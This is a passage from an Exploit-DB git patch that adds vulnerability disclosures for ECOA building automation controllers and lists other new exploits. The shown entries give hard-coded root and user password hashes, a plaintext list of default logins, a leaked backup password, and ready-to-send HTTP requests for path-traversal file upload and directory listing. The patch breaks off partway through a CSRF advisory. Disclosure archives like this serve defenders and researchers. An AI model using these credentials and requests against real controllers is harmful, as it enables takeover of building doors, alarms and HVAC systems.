From 629e35077483549945dee8dd7d6b14ce11045337 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 14 Sep 2021 05:02:12 +0000 Subject: [PATCH] DB: 2021-09-14 18 changes to exploits/shellcodes Active WebCam 11.5 - Unquoted Service Path ECOA Building Automation System - Missing Encryption Of Sensitive Information Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai ECOA Building Automation System - Hard-coded Credentials SSH Access Men Salon Management System 1.0 - Multiple Vulnerabilities ECOA Building Automation System - Weak Default Credentials ECOA Building Automation System - Path Traversal Arbitrary File Upload ECOA Building Automation System - Directory Traversal Content Disclosure ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF) ECOA Building Automation System - Cookie Poisoning Authentication Bypass ECOA Building Automation System - Configuration Download Information Disclosure ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function ECOA Building Automation System - Remote Privilege Escalation ECOA Building Automation System - Local File Disclosure ECOA Building Automation System - Arbitrary File Deletion Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) --- exploits/hardware/local/50283.txt | 109 +++++++++++ exploits/hardware/remote/50282.txt | 114 +++++++++++ exploits/hardware/webapps/50275.txt | 117 +++++++++++ exploits/hardware/webapps/50276.txt | 123 ++++++++++++ exploits/hardware/webapps/50277.txt | 144 ++++++++++++++ exploits/hardware/webapps/50278.txt | 122 ++++++++++++ exploits/hardware/webapps/50279.txt | 121 ++++++++++++ exploits/hardware/webapps/50280.txt | 131 +++++++++++++ exploits/hardware/webapps/50281.txt | 114 +++++++++++ exploits/hardware/webapps/50284.txt | 110 +++++++++++ exploits/hardware/webapps/50285.txt | 133 +++++++++++++ exploits/hardware/webapps/50286.txt | 110 +++++++++++ exploits/php/webapps/50274.txt | 30 +++ exploits/php/webapps/50287.py | 75 +++++++ exploits/php/webapps/50288.py | 77 ++++++++ exploits/python/local/50289.py | 49 +++++ exploits/windows/local/50273.txt | 28 +++ files_exploits.csv | 17 ++ files_shellcodes.csv | 1 + shellcodes/windows_x86-64/50291.c | 290 ++++++++++++++++++++++++++++ 20 files changed, 2015 insertions(+) create mode 100644 exploits/hardware/local/50283.txt create mode 100644 exploits/hardware/remote/50282.txt create mode 100644 exploits/hardware/webapps/50275.txt create mode 100644 exploits/hardware/webapps/50276.txt create mode 100644 exploits/hardware/webapps/50277.txt create mode 100644 exploits/hardware/webapps/50278.txt create mode 100644 exploits/hardware/webapps/50279.txt create mode 100644 exploits/hardware/webapps/50280.txt create mode 100644 exploits/hardware/webapps/50281.txt create mode 100644 exploits/hardware/webapps/50284.txt create mode 100644 exploits/hardware/webapps/50285.txt create mode 100644 exploits/hardware/webapps/50286.txt create mode 100644 exploits/php/webapps/50274.txt create mode 100755 exploits/php/webapps/50287.py create mode 100755 exploits/php/webapps/50288.py create mode 100755 exploits/python/local/50289.py create mode 100644 exploits/windows/local/50273.txt create mode 100644 shellcodes/windows_x86-64/50291.c diff --git a/exploits/hardware/local/50283.txt b/exploits/hardware/local/50283.txt new file mode 100644 index 000000000..c95e19b73 --- /dev/null +++ b/exploits/hardware/local/50283.txt @@ -0,0 +1,109 @@ +# Exploit Title: ECOA Building Automation System - Missing Encryption Of Sensitive Information +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Missing Encryption Of Sensitive Information + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller stores sensitive data (backup exports) in clear-text. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5676 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5676.php + + +25.06.2021 + +-- + + +Missing Encryption of Sensitive Information +------------------------------------------- + +- Data stored on the system is not protected/encrypted. + +sql_[DATE]linux.dat reveals clear-text password from backup. + +Excerpt from DB: + +Insert into userlist (userid,userpwd,userClass,userfrm,duetime,modidate,userMenu,usertel,usermobil,usermail,gpname,userCname,usergrp) values (?,?,?,?,?,?,?,?,?,?,?,?,?)%%2%%1user%%3user%%312%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1guest%%3guest%%31%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1humex%%3humex4377 \ No newline at end of file diff --git a/exploits/hardware/remote/50282.txt b/exploits/hardware/remote/50282.txt new file mode 100644 index 000000000..05569b7d2 --- /dev/null +++ b/exploits/hardware/remote/50282.txt @@ -0,0 +1,114 @@ +# Exploit Title: ECOA Building Automation System - Hard-coded Credentials SSH Access +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Hard-coded Credentials SSH Access + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller is vulnerable to hard-coded credentials within its Linux distribution image. +These sets of credentials are never exposed to the end-user and cannot be changed through any +normal operation of the device. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5675 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5675.php + + +25.06.2021 + +-- + + +Hard-coded Credentials / Remote SSH Access +------------------------------------------ + +- Exercise for the nation-state actors and actresses. + + +root:$1$ILT0V4Sf$AR4nYzAFri3Cqi2BwFD/h.:16183:0:99999:7::: +user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7::: +webs:$1$ZP8rifJj$8Nq6pvZfZleSOM1NxQAck0::::::: +admin:$1$7BGOwUYp$dgzOcdE9eXPmxZ0PomIOR0::::::: +ecoa:$1$Ux/uar1o$RlMzoY0I7KEMkmNzDqzFz1:-5835:0:99999:7::: +humex:$1$1v5rveDi$bXRhL1q20wpYM5vo3aZ050:-5877:0:99999:7::: +guest:$1$Zb9DELKT$IK8/EnLI8o0G36kjjBjWj1:6845:0:99999:7::: \ No newline at end of file diff --git a/exploits/hardware/webapps/50275.txt b/exploits/hardware/webapps/50275.txt new file mode 100644 index 000000000..97979a7d3 --- /dev/null +++ b/exploits/hardware/webapps/50275.txt @@ -0,0 +1,117 @@ +# Exploit Title: ECOA Building Automation System - Weak Default Credentials +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + + +ECOA Building Automation System Weak Default Credentials + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller uses weak set of default administrative credentials that can be easily guessed +in remote password attacks and gain full control of the system. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5668 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5668.php + + +25.06.2021 + +-- + + +Default / Weak Credentials +-------------------------- + +- Attacker can use default credentials and authenticate to the SmartHome, Building Automation and Access Control System. + + +Credentials: + +guest:guest +user:user +admin:admin +root:embed +embed:power +administrator:empty +humex:humex4377 +ecoa:ecoa4377 \ No newline at end of file diff --git a/exploits/hardware/webapps/50276.txt b/exploits/hardware/webapps/50276.txt new file mode 100644 index 000000000..5eee09785 --- /dev/null +++ b/exploits/hardware/webapps/50276.txt @@ -0,0 +1,123 @@ +# Exploit Title: ECOA Building Automation System - Path Traversal Arbitrary File Upload +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Path Traversal Arbitrary File Upload + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller suffers from an arbitrary file write and directory traversal vulnerability. +Using the POST parameters 'rbt' and 'filename', attackers can set arbitrary values for location +and content type and gain the possibility to execute arbitrary code on the affected device. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5669 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5669.php + + +25.06.2021 + +-- + + +Directory Traversal / File Path Traversal / Unrestricted File Upload +-------------------------------------------------------------------- + +- Abusing the 'filename' and 'rbt' POST parameter, attacker can navigate outside current directory and write files in arbitrary location. +- There is no validation on file content, file extension and file location. + + +Request: + +POST /ebd-bin/upload HTTP/1.1 +Host: 192.168.1.3:8080 + +------WebKitFormBoundaryvxy2zFDs1Z69pfRB +Content-Disposition: form-data; name="rbt" + +ecsfile +------WebKitFormBoundaryvxy2zFDs1Z69pfRB +Content-Disposition: form-data; name="filename"; filename="../../../anyfile.ext" +Content-Type: application/octet-stream + +ANY_CONTENT_HERE +------WebKitFormBoundaryvxy2zFDs1Z69pfRB-- \ No newline at end of file diff --git a/exploits/hardware/webapps/50277.txt b/exploits/hardware/webapps/50277.txt new file mode 100644 index 000000000..6f96b975c --- /dev/null +++ b/exploits/hardware/webapps/50277.txt @@ -0,0 +1,144 @@ +# Exploit Title: ECOA Building Automation System - Directory Traversal Content Disclosure +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Directory Traversal Content Disclosure + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the +GET parameter 'cpath' in File Manager (fmangersub), attackers can disclose directory content on the +affected device. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5670 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php + + +25.06.2021 + +-- + + +Directory Traversal Content Disclosure +-------------------------------------- + +- Abysing the 'cpath' GET parameter, attackers can disclose directory contents by directory traversal attacks. +- cpath=. +- cpath=../../../../../../../etc + + +Request: + +GET /fmangersub?cpath=/ HTTP/1.1 +Host: 192.168.1.3:8080 + +bacevent.elf +redown.elf +system.bin +webnewc.elf +err.txt +hole.elf +modbustcp.elf +ianplc.bin +hitachi.el +bacser.elf +root.pem +pwsd.bin +server.lst +symtbl.tbl +client.pem +gb-unicode.bin +httpser.elf +namelst.bin +AI.tbl +BI.tbl +AV.tbl +BV.tbl +mstplalf +rthost.elf +big5-unicode.bin +version.bin +modbus.elf +rbdev.bin +rbdlc.elf +powercrd.elf \ No newline at end of file diff --git a/exploits/hardware/webapps/50278.txt b/exploits/hardware/webapps/50278.txt new file mode 100644 index 000000000..89d4eec1e --- /dev/null +++ b/exploits/hardware/webapps/50278.txt @@ -0,0 +1,122 @@ +# Exploit Title: ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF) +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Cross-Site Request Forgery + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The Building Automation System / SmartHome allows users to perform certain actions via HTTP requests +without performing any validity checks to verify the requests. These actions can be exploited to +perform any CRUD operation like user creation, alarm 